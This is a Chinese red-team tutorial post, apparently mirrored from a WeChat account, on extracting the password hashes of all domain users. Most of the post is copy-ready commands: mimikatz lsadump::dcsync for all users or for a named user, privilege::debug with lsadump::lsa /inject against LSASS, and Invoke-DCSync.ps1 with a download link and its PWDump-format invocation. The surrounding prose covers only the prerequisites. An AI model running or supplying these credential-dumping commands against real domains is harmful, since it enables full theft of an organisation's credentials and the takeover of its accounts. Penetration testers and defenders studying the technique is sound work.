前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >利用 dcsync 获取域内所有用户哈希值

利用 dcsync 获取域内所有用户哈希值

作者头像
渗透攻击红队
发布2020-12-14 11:36:29
3.5K0
发布2020-12-14 11:36:29
举报
文章被收录于专栏:漏洞知识库

大家好,这里是 渗透攻击红队 的第 34 篇文章,本公众号会记录一些我学习红队攻击的复现笔记(由浅到深),不出意外每天一更

dcsync 获取域内用户哈希值

mimikatz 转储哈希值

mimikatz 有一个 dcsync 功能,可以利用卷影拷贝服务直接读取 ntds.dit 文件并检索域散列值。

前提必须使用管理员权限运行 mimikatz 才可以读取 ntds.dit。

在域内任意一台主机,以域管理员权限执行命令:

代码语言:javascript
复制
lsadump::dcsync /domain:god.org /all /csv

使用 mimikatz 的 dcsync 功能也可以导出指定用户的散列值,导出用户 mary 的散列值:

代码语言:javascript
复制
lsadump::dcsync /domain:god.org /user:mary

通过转储 lsass.exe 进程对散列值进行 Dump 操作:(导出域内所有账号和域散列值)

代码语言:javascript
复制
privilege::debug
log
lsadump::lsa /inject

如果 mimikatz 没有预先执行 privilege::debug 命令,将导致权限不足、读取失败。如果用户数量太多,mimikatz 无法完全显示出来,可以先执行 log(会在mimikatz目录下生成一个文本文件,用于记录mimikatz的所有执行结果)


powershell dcsync 获取域内用户哈希值

Invoke-DCSync.ps1 可以利用 dcsync 直接读取 ntds.dit,以获取域账号和域散列值。

下载地址:https://gist.github.com/monoxgas/9d238accd969550136db

代码语言:javascript
复制
Import-Module .\Invoke-DCSync.ps1
Invoke-DCSync -PWDumpFormat
本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2020-11-27,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 渗透攻击红队 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
访问管理
访问管理(Cloud Access Management,CAM)可以帮助您安全、便捷地管理对腾讯云服务和资源的访问。您可以使用CAM创建子用户、用户组和角色,并通过策略控制其访问范围。CAM支持用户和角色SSO能力,您可以根据具体管理场景针对性设置企业内用户和腾讯云的互通能力。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档